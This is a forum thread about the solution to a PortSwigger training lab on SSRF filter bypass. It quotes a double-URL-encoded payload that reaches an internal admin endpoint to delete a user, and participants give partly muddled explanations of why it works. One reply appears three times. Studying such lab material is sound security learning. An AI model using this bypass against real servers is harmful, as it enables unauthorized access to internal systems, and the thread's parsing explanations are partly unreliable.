Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

[SPOILER] "Lab: SSRF with whitelist-based input filter" explanation?

Jorrit | Last updated: Jul 21, 2021 11:12PM UTC

Hi! I do not understand why the payload "http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos" works in this lab. I think I understand this part: The filter only URL decodes a single time, which makes the username localhost%23, which is still accepted by the filter. The code that handles the backend request recursively URL decodes which make the requested URL: http://localhost#@stock.weliketoshop.net/admin/delete?username=carlos" Please correct me if I did not explain it correctly. The part I do not understand is how the path /admin/delete?username=carlos gets appended to http://localhost to get http://localhost/admin/delete?username=carlos Can someone please explain this to me? Thank you! Kind Regards, Jorrit Wegman

Uthman, PortSwigger Agent | Last updated: Jul 22, 2021 09:23AM UTC

'http://localhost#@stock.weliketoshop.net/admin/delete?username=carlos' and 'http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos' look different to the server. You will notice that the second is double URL-encoded and this results in a 500 internal server error, whilst the former request results in a 400 response. The lab is essentially telling you that '#' is parsed differently when it is double URL-encoded as %2523. '/admin/delete?username=carlos' is just added to access the admin console and delete the user.

Jorrit | Last updated: Jul 22, 2021 11:25AM UTC

Thank you for the response. I understand why /admin/delete is added, but I do not understand how it's still in the path even though it is place after the '#' character.

Uthman, PortSwigger Agent | Last updated: Jul 23, 2021 08:40AM UTC

Since the username is only parsed when the '#' is double-URL encoded, the URL becomes http://localhost:80/admin/delete?username=carlos The server extracts the hostname and validates it against a whitelist so http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos becomes http://localhost:80/admin/delete?username=carlos to the server. Unfortunately, we do not provide 1-1 support for the academy but this post will remain up if anyone else wants to contribute with some further input!

Harshit | Last updated: Jul 24, 2021 04:07AM UTC

I think there is another filter that strips everything from %25 until it sees / and the reaming part concatenates, which leads to http://localhost/admin.

Harshit | Last updated: Jul 24, 2021 04:07AM UTC

I think there is another filter that strips everything from %25 until it sees / and the reaming part concatenates, which leads to http://localhost/admin.

Harshit | Last updated: Jul 24, 2021 04:07AM UTC

I think there is another filter that strips everything from %25 until it sees / and the reaming part concatenates, which leads to http://localhost/admin.

Harshit | Last updated: Jul 24, 2021 04:07AM UTC